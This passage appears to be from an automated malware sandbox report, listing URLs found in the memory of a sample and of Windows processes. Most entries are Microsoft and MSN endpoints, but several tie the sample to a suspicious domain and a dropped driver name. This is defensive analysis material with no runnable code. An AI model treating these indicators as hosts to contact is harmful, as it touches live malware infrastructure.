Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.live.com/Web/
Source: explorer.exe, 0000000A.00000002.2928181034.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1448330097.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1449558403.0000000008820000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000E.00000000.1529627936.00000269817E0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000012.00000000.1706581163.0000018570620000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: PfBjDhHzvV.exe, 00000000.00000002.2234098770.000000000040D000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.apache.org/
Source: PfBjDhHzvV.exe, PfBjDhHzvV.exe, 00000000.00000002.2234177696.0000000000415000.00000002.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2234330420.0000000000417000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000A.00000003.2275648262.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1455294750.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275779862.000000000C44D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2283066349.000000000C450000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000A.00000000.1446640101.00000000071B2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.foreca.com
Source: PfBjDhHzvV.exe, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe | String found in binary or memory: http://www.klkjwre9fqwieluoi.info/
Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
Source: PfBjDhHzvV.exe, 00000000.00000002.2234098770.000000000040D000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.zeustech.net/
Source: svchost.exe, 00000007.00000000.1425650401.0000018CE7268000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000007.00000000.1425650401.0000018CE7268000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://accounts.xboxlive.com/codeOfConduct/
Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com
Source: explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.comt
Source: SearchApp.exe, 0000000F.00000000.1560312039.000001F49B244000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1566432203.000001F49BCBA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544714307.000001EC94D13000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: SearchApp.exe, 0000000F.00000000.1547534482.000001EC9A36A000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1545849761.000001EC9969A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: SearchApp.exe, 0000000F.00000000.1561694952.000001F49B4FD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/fixsearch
Source: explorer.exe, 0000000A.00000000.1450832815.0000000008F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDC6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
Source: explorer.exe, 0000000A.00000002.3016089199.0000000008DB0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000003.2275899145.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000002.2800092520.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1446640101.0000000007276000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 0000000A.00000002.3016089199.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1543496408.000001EC93096000.00000004.00000001.00020000.00000000.sdmp, TextInputHost.exe, 00000018.00000000.1758664936.00000177A5943000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
Source: svchost.exe, 00000007.00000000.1425650401.0000018CE7268000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.actiP
Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.activity.windows.com
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comLimit
            Source: explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000008.00000000.1429306447.000001D959F14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://da.xboxservices.com/DigitalAttachmentFD/AttachmentRecords
            Source: explorer.exe, 0000000A.00000000.1455294750.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1499873714.000001A446400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comp
            Source: SearchApp.exe, 0000000F.00000000.1578862210.000001F49DA23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
            Source: SearchApp.exe, 0000000F.00000000.1561417980.000001F49B420000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
            Source: SearchApp.exe, 0000000F.00000000.1561453752.000001F49B440000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api
            Source: SearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/v1/configuration/cortana
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
            Source: SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
            Source: SearchApp.exe, 0000000F.00000000.1607695646.000001F4AEA4A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/https://substrate.office.comhttps://outlook.office.com/pZ
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://live.xbox.com/purchase/xbox/
            Source: SearchApp.exe, 0000000F.00000000.1563059648.000001F49B6D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1563059648.000001F49B6D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: WinStore.App.exe, 00000016.00000000.1751253222.00000147C8E02000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
            Source: svchost.exe, 00000007.00000000.1425679854.0000018CE728E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
            Source: WinStore.App.exe, 00000016.00000000.1751253222.00000147C8E02000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localhttps://login.windows.local/
            Source: svchost.exe, 00000007.00000000.1425679854.0000018CE728E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localicy
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localtb1
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1563634217.000001F49B87D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
            Source: SearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/cortana
            Source: SearchApp.exe, 0000000F.00000000.1561497256.000001F49B460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api33366b5b-54ef-48bf-819d-677748eae9e33B199897-A63E-44DC-BF20-DF6F6F2
            Source: SearchApp.exe, 0000000F.00000000.1578753735.000001F49DA00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1574285798.000001F49D827000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1549685571.000001F49A708000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
            Source: SearchApp.exe, 0000000F.00000000.1578437841.000001F49D9E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/web-widget?form=M
            Source: explorer.exe, 0000000A.00000000.1455294750.000000000C091000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000D.00000000.1500026385.000001A4464C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: SearchApp.exe, 0000000F.00000000.1608010494.000001F4AEA67000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owahttps://outlook.office.com/owaCodexChatButtonUpperRight
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
            Source: SearchApp.exe, 0000000F.00000000.1561694952.000001F49B4FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/&
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1561722325.000001F49B505000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
            Source: SearchApp.exe, 0000000F.00000000.1599317840.000001F4AE716000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.AccessZ
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
            Source: SearchApp.exe, 0000000F.00000000.1599565472.000001F4AE720000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWritej
            Source: SearchApp.exe, 0000000F.00000000.1599317840.000001F4AE700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/Z
            Source: SearchApp.exe, 0000000F.00000000.1587591500.000001F4AE17E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
            Source: SearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
            Source: explorer.exe, 0000000A.00000000.1455294750.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1499131744.000001A4423E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcemberx
            Source: SearchApp.exe, 0000000F.00000000.1572104541.000001F49D680000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rafd.aRmsDeferhttps://raka.https://r.fRmsDeferhttps://rcf.
            Source: SearchApp.exe, 0000000F.00000000.1578862210.000001F49DA23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
            Source: smartscreen.exe, 00000014.00000000.1731292437.00000159BD6E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://smartscreen.microsoft.
            Source: SearchApp.exe, 0000000F.00000000.1653277337.000001F4B1510000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1566432203.000001F49BCBA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/
            Source: SearchApp.exe, 0000000F.00000000.1561694952.000001F49B4FD000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1587331376.000001F4AE100000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1578862210.000001F49DA23000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1564687977.000001F49BA00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1619112858.000001F4AECA2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
            Source: SearchApp.exe, 0000000F.00000000.1617033060.000001F4AEC86000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Access
            Source: SearchApp.exe, 0000000F.00000000.1607695646.000001F4AEA3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Accesshttps://outlook.office.com/User.ReadWrite
            Source: SearchApp.exe, 0000000F.00000000.1606759519.000001F4AE9D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
            Source: SearchApp.exe, 0000000F.00000000.1562380324.000001F49B5D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite_iframe.contentWindow.BingAtWork.work
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
            Source: SearchApp.exe, 0000000F.00000000.1581063668.000001F49DC48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/dsapi/v1.0/
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/
            Source: SearchApp.exe, 0000000F.00000000.1606759519.000001F4AE9D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=
            Source: SearchApp.exe, 0000000F.00000000.1562196902.000001F49B590000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/queryhttps://substrate.office365.us/search/api/v2/query
            Source: SearchApp.exe, 0000000F.00000000.1581063668.000001F49DC48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/imageB2/v1.0/users/
            Source: smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
            Source: smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us
            Source: smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
            Source: SearchApp.exe, 0000000F.00000000.1543263822.000001EC93000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
            Source: SearchApp.exe, 0000000F.00000000.1543263822.000001EC93000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000A.00000000.1450832815.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
            Source: explorer.exe, 0000000A.00000000.1455294750.000000000C091000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000D.00000000.1499873714.000001A446400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: SearchApp.exe, 0000000F.00000000.1566609930.000001F49BD00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: SearchApp.exe, 0000000F.00000000.1605212499.000001F4AE90E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.www.yahoo.cn.bing.www.baidu.www.bing.www.yandex.google
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz
            Source: SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz0
            Source: SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/basketball-frvr/cg-9npd4c9369l0
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1
            Source: SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1F
            Source: SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play?ocid=winpsearchboxexpcta2&cgfrom=cg_dsb_seeMore
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
